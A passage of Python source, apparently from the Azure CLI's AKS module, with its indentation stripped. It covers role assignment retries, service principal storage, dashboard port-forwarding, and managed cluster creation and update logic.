pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=None,
appgw_watch_namespace=None,
enable_aad=False,
aad_admin_group_object_ids=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
availability_zones=node_zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
service_principal_profile.client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_id,
appgw_subnet_id,
appgw_shared,
appgw_watch_namespace
)
monitoring = False
if 'omsagent' in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(
subscription=appgw_id_dict["subscription"],
resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: {appgw_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
if CONST_INGRESS_APPGW_SUBNET_ID in addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_profile.client_id, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: {subnet_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
enable_rbac = True
if disable_rbac:
enable_rbac = False
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
logger.info('AKS cluster is creating, please wait...')
if monitoring:
# adding a wait here since we rely on the result for role assignment
created_cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(created_cluster, cluster_resource_id, cmd)
else:
created_cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=headers).result()
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if created_cluster.identity_profile is None or \
created_cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = created_cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
aad_tenant_id=None,
aad_admin_group_object_ids=None):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not update_aad_profile:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
node_count = instance.agent_pool_profiles[0].count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
